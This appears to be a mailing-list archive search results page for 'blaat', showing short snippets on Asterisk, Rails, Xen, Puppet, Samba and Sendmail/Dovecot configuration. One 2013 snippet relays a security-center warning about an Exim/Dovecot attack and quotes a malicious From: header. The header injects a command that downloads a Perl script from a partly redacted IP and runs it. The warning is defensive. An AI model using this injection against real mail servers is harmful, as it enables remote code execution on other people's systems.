search for: blaat

Displaying 12 results from an estimated 12 matches for "blaat".

Did you mean: blat
2005 Aug 18
2
Asterisk configuration from database with res_config
...es: Extconfig.conf: [settings] ;uncomment to load queues.conf via the db engine. ;queues.conf => odbc,mysql1,ast_config ;extensions.conf => odbc,mysql1,ast_config sip.conf => odbc,mysql1,ast_config res_odbc.conf: ;;; odbc setup file [mysql1] dsn => MySQL-asterisk username => blaat password => blaat pre-connect => yes [mysql2] dsn => MySQL-asterisk username => myuser password => mypass pre-connect => yes odbc to mysql is working fine, I tested it. here is my odbc.ini from /etc/ [MySQL-asterisk] Description = MySQL Asterisk database Trace = Off Trace...
2006 Apr 03
7
Getters and setters problem?
...accessor :password, :login attr_accessible :password, :name, :login, :email validates_confirmation_of :password validates_presence_of :name, :login, :password, :email validates_uniqueness_of :login def before_create self.password=User.hash_password(self.password) self.login="blaat" end def after_create @password=nil end private def self.hash_password(password) Digest::SHA1.hexdigest(password) end end Thanks in advance, Wijnand -- OpenBSD needs your help improving the softwareworld, please donate: http://openbsd.org/donations.html Yes big code usin...
2005 Aug 18
0
Asterisk configuration from database
...es: Extconfig.conf: [settings] ;uncomment to load queues.conf via the db engine. ;queues.conf => odbc,mysql1,ast_config ;extensions.conf => odbc,mysql1,ast_config sip.conf => odbc,mysql1,ast_config res_odbc.conf: ;;; odbc setup file [mysql1] dsn => MySQL-asterisk username => blaat password => blaat pre-connect => yes [mysql2] dsn => MySQL-asterisk username => myuser password => mypass pre-connect => yes odbc to mysql is working fine, I tested it. here is my odbc.ini from /etc/ [MySQL-asterisk] Description = MySQL Asterisk database Trace = Off Trace...
2018 Oct 09
3
Test report xen_4.11.1~pre.20180911.5acdd26fdc+dfsg-2
....20180911.5acdd26fdc+dfsg-2~bpo9+1) ... So it seems a file has moved to another package, and the order in which they are upgraded matters. In the end I still have xen-hypervisor-4.8-amd64 and libxen-4.8, all other packages are 4.11-blah. ---- >8 ---- 5. Try to still use 4.8 -# xen create -c blaat.bofh.dpl.mendix.net Parsing config from blaat.bofh.dpl.mendix.net libxl: info: libxl_create.c:105:libxl__domain_build_info_setdefault: qemu-xen is unavailable, using qemu-xen-traditional instead: No such file or directory xenconsole: Could not read tty from store: Success There's no xenconsole...
2011 Dec 10
5
create user and push out keys.
Hello Im just been working with puppet, the first usecase i have is to set up a system to create users and then push ssh keys on this machines in the create users .ssh files. I just started with puppet so i am a bit cluesless, Can someone push me in the right direction? Im having a centos enviorment. -- You received this message because you are subscribed to the Google Groups "Puppet
2004 Nov 22
1
Strange Fromuser behavior?
Strange things are happening at my asterisk box :) I've got asterisk setup to dail out with sip to my SIP provider. I've got NO fromuser/fromdomain stuff setup in my sip.conf When I place a call with my Siemens Optipoint 400 SIP phone everything is allright, the From: header is stating the username of the Siemens phone. When I place a call with X-Lite the From: header is altered and reads
2004 Oct 18
1
scrambled filename.
Hello there, If i create a file starting with nul. via command shell access, example: nul.txt or nul.blaat.txt Samba show's this file scrambled, i've tested this on samba 3.04 on AIX and FC2 Linux samba 3.0.7-2. My file nul.txt is showed via samba as: NDH6SA~M.TXT. I have a default samba configuration: [global] workgroup = C3D-VR.COM server string = C3D Samba Server l...
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example config...
2009 Feb 19
1
Sendmail + Deliver as an LDA probs
...ing $# deliver -u testuser < testmail <-- he delivers my mail in the correct mailbox as stated in my dovecot passdb file homedir. So deliver is working fine ! ---- I used the dovecot.m4 from wiki.dovecot.org/LDA/sendmail sendmail.mc fragment (only lines affecting Local delivery) : DOMAIN(`blaat')dnl MODIFY_MAILER_FLAGS(`LOL', `-S')dnl FEATURE(`local_procmail')dnl define(`LOL_MAILER_PATH',`/usr/bin/procmail')dnl define(`PROCMAIL_MAILER_PATH',`/usr/bin/procmail')dnl dnl MAILER(`local')dnl MAILER(`smtp')dnl MAILER(`procmail')dnl MAILER(`dovecot'...
2018 Oct 05
4
Entirely new Xen packaging
I have now finished totally rewriting the Xen package in Debian, from scratch. Amazingly as soon as I got a package which was lintian-clean and would install, it worked first time ! I have generated 18 patches to go upstream which I have sent to xen-devel. There are two more, xenstore ABI patches, which need a bit of tidying up. There is still room for improvement but it is now clearly ready
2006 Jun 04
2
Monitor application and e-mailing attachment
...If I check my log-files I don't see that the mail gets send. I tried to run the script manually and that worked without problems. I checked if it was a file rights issue, but even when I run Asterisk as root, it doesn't work. Then I just mad a little scipt that said "touch /etc/blaat" and if I executed that with the system command, it worked perfectly. Can anyone give a hint about what I'm doing wrong ? Regards, Attilla
2008 May 22
1
procmail --> deliver question
...ol/mail/%u Could you guys point me out in the right direction please ? Another question about the logging with deliver... I've put the following in my deliver.conf : deliver.conf in the lda section : log_path = /var/log/dovecot/deliver.log info_log_path = /var/log/dovecot-deliver.log root at blaat:/home/kris# ls -la /var/log/dovecot/ total 232 drwxrwxrwx 2 root root 4096 2008-05-20 10:44 . drwxr-xr-x 11 root root 4096 2008-05-19 10:08 .. -rw-rw-rw- 1 root root 0 2008-05-20 10:44 deliver.log But it's not logging at all... Also tried the syslog alternative, no logging either....